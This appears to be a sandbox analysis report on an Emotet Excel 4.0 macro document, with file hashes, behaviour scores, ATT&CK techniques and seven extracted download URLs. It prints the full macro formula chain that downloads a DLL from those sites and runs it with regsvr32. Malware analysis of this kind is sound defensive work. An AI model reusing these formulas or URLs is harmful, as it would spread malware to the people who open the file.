Overview

overview

10

Static

static

10

4ac3cfd7ad...1.xlsm

windows7-x64

10

4ac3cfd7ad...1.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    emotet.xlsm.zip

  • Size

    43KB

  • Sample

    230127-lke43abe6y

  • MD5

    a6f1ba69ebbbaa5bf6c69cffe19f1402

  • SHA1

    8ceef600f9b895e9753b27e788bd6c522f3382f1

  • SHA256

    571c1cacae5f9dc6b7fe740408ede0afd02a9f897957e335432f0e37113df1dd

  • SHA512

    c0885b726a30191e60f5a53078113a0b2b3ff4f838d8deb2fdb6f3b714f83d6cced9a813f9982c89a66e7f01262aecedb00f0a233855848fc39879c88d92679d

  • SSDEEP

    768:MtNLMO8DdkGVeFkJxUzdD3Vn3+znrhkeB28WXc6ChsAIKWq5mWEVaWl+Lmg:MtNyDd7V9xUR8Jlt6ynEV38

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://www.arkpp.com/ARIS-BSU/9K1/

http://www.avrworks.com/mail/0Z4GbaKuDTGprJ/

http://www.babylinesl.com/catalog/iVsl6YvlyIyX/

https://physioacademy.co.uk/blog/Qs8QZTp0Z6nKf9YjVBMS/

https://unada.us/acme-challenge/3NXwcYNCa/

https://automobile-facile.fr/wp-admin/QV/

https://alebit.de/css/gqKtdKmTsC4iDh/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.arkpp.com/ARIS-BSU/9K1/","..\fbd.dll",0,0) =IF('EGVEB'!D9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.avrworks.com/mail/0Z4GbaKuDTGprJ/","..\fbd.dll",0,0)) =IF('EGVEB'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.babylinesl.com/catalog/iVsl6YvlyIyX/","..\fbd.dll",0,0)) =IF('EGVEB'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://physioacademy.co.uk/blog/Qs8QZTp0Z6nKf9YjVBMS/","..\fbd.dll",0,0)) =IF('EGVEB'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://unada.us/acme-challenge/3NXwcYNCa/","..\fbd.dll",0,0)) =IF('EGVEB'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://automobile-facile.fr/wp-admin/QV/","..\fbd.dll",0,0)) =IF('EGVEB'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alebit.de/css/gqKtdKmTsC4iDh/","..\fbd.dll",0,0)) =IF('EGVEB'!D21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\fbd.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://www.arkpp.com/ARIS-BSU/9K1/

Targets

    • Target

      4ac3cfd7ad8cf62e160f55053626f2a2a1cf14ca1045220bb88e38d8e7771001.xlsm

    • Size

      48KB

    • MD5

      c16e305c08dc20f3661f466d0a4f82bd

    • SHA1

      439fdd1d3962e48c01f74e978492d0de412f99c3

    • SHA256

      4ac3cfd7ad8cf62e160f55053626f2a2a1cf14ca1045220bb88e38d8e7771001

    • SHA512

      f9830c9c09dab3cd82b298c6ce62502d41b7670378b4e0dba4fa46a732f3839c896693929eae491f710a74480b0ffbdcd40450793b43fcd3772c872894889399

    • SSDEEP

      1536:1lFXmY3B6Y8r7mfqN1+TpCgcgsMA6VIcrW:1l1mG4YqVN1+TtRrW

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks